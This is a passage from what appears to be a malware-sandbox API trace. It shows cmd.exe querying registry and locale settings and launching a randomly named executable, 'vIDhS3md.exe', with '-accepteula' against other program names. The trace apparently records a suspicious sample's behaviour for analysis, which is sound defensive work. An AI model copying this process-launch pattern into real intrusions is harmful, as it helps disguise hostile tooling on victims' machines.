RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x40, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.342] RegCloseKey (hKey=0x94) returned 0x0 [0297.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x54ea10 | out: phkResult=0x54ea10*=0x94) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x40, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x1, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x1, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x0, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.342] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x9, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.343] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x4, lpData=0x54ea1c*=0x9, lpcbData=0x54ea18*=0x4) returned 0x0 [0297.343] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x54ea14, lpData=0x54ea1c, lpcbData=0x54ea18*=0x1000 | out: lpType=0x54ea14*=0x0, lpData=0x54ea1c*=0x9, lpcbData=0x54ea18*=0x1000) returned 0x2 [0297.343] RegCloseKey (hKey=0x94) returned 0x0 [0297.343] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432b1 [0297.343] srand (_Seed=0x5bb432b1) [0297.343] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner" [0297.343] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner" [0297.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5d7f50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0297.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.343] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.343] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.343] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0297.343] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0297.343] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0297.343] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0297.343] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0297.343] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0297.343] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0297.343] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0297.343] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0297.344] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x54f7e8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.344] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x54f7e8, lpFilePart=0x54f7e0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x54f7e0*="Desktop") returned 0x1d [0297.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.344] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x54f568 | out: lpFindFileData=0x54f568) returned 0x5d8160 [0297.344] FindClose (in: hFindFile=0x5d8160 | out: hFindFile=0x5d8160) returned 1 [0297.344] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x54f568 | out: lpFindFileData=0x54f568) returned 0x5d8160 [0297.344] FindClose (in: hFindFile=0x5d8160 | out: hFindFile=0x5d8160) returned 1 [0297.344] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0297.344] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x54f568 | out: lpFindFileData=0x54f568) returned 0x5d8160 [0297.344] FindClose (in: hFindFile=0x5d8160 | out: hFindFile=0x5d8160) returned 1 [0297.344] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0297.344] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0297.345] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0297.345] GetEnvironmentStringsW () returned 0x5da090* [0297.345] FreeEnvironmentStringsA (penv="=") returned 1 [0297.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.345] GetConsoleOutputCP () returned 0x1b5 [0297.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.370] GetUserDefaultLCID () returned 0x409 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x54f918, cchData=128 | out: lpLCData="0") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x54f918, cchData=128 | out: lpLCData="0") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x54f918, cchData=128 | out: lpLCData="1") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0297.370] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0297.370] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0297.371] GetConsoleTitleW (in: lpConsoleTitle=0x5d8cf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.420] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0297.420] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0297.420] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0297.420] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0297.421] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0297.421] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0297.421] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0297.421] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0297.421] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0297.421] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0297.421] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0297.422] GetConsoleTitleW (in: lpConsoleTitle=0x54f600, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.423] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.423] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0297.424] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0297.425] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0297.425] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0297.425] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0297.425] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0297.425] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0297.426] SetErrorMode (uMode=0x0) returned 0x0 [0297.426] SetErrorMode (uMode=0x1) returned 0x0 [0297.426] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5da098, lpFilePart=0x54f10c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x54f10c*="Desktop") returned 0x1d [0297.426] SetErrorMode (uMode=0x0) returned 0x1 [0297.426] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0297.426] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.430] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.431] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x54eeb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x54eeb8) returned 0x5d9468 [0297.431] FindClose (in: hFindFile=0x5d9468 | out: hFindFile=0x5d9468) returned 1 [0297.431] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0297.431] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0297.431] GetConsoleTitleW (in: lpConsoleTitle=0x54f38c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0297.433] InitializeProcThreadAttributeList (in: lpAttributeList=0x54f2b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x54f29c | out: lpAttributeList=0x54f2b8, lpSize=0x54f29c) returned 1 [0297.434] UpdateProcThreadAttribute (in: lpAttributeList=0x54f2b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x54f2a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x54f2b8, lpPreviousValue=0x0) returned 1 [0297.434] GetStartupInfoW (in: lpStartupInfo=0x54f2f0 | out: lpStartupInfo=0x54f2f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Jou", _MaxCount=0x7) returned -3 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0297.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0297.435] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0297.435] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0297.436] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x54f240*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x54f28c | out: lpCommandLine="vIDhS3md.exe -accepteula \"Journal.exe\" -nobanner", lpProcessInformation=0x54f28c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcbc, dwThreadId=0xcc0)) returned 1 [0297.442] CloseHandle (hObject=0xa4) returned 1 [0297.442] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0297.442] GetEnvironmentStringsW () returned 0x5d8160* [0297.442] FreeEnvironmentStringsA (penv="=") returned 1 [0297.442] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0299.510] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x54f224 | out: lpExitCode=0x54f224*=0x1) returned 1 [0299.510] CloseHandle (hObject=0xa8) returned 1 [0299.510] _vsnwprintf (in: _Buffer=0x54f30c, _BufferCount=0x13, _Format="%08X", _ArgList=0x54f22c | out: _Buffer="00000001") returned 8 [0299.510] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0299.510] GetEnvironmentStringsW () returned 0x5d8160* [0299.510] FreeEnvironmentStringsA (penv="=") returned 1 [0299.510] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0299.510] GetEnvironmentStringsW () returned 0x5d8160* [0299.510] FreeEnvironmentStringsA (penv="=") returned 1 [0299.510] DeleteProcThreadAttributeList (in: lpAttributeList=0x54f2b8 | out: lpAttributeList=0x54f2b8) [0299.510] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.510] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0299.510] _get_osfhandle (_FileHandle=1) returned 0xc0 [0299.510] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0299.510] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.510] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0299.585] SetConsoleInputExeNameW () returned 0x1 [0299.586] GetConsoleOutputCP () returned 0x1b5 [0299.586] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0299.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.586] exit (_Code=1) Thread: id = 1002 os_tid = 0xc90 Process: id = "143" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6a6f2000" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "105" os_parent_pid = "0xf4c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = 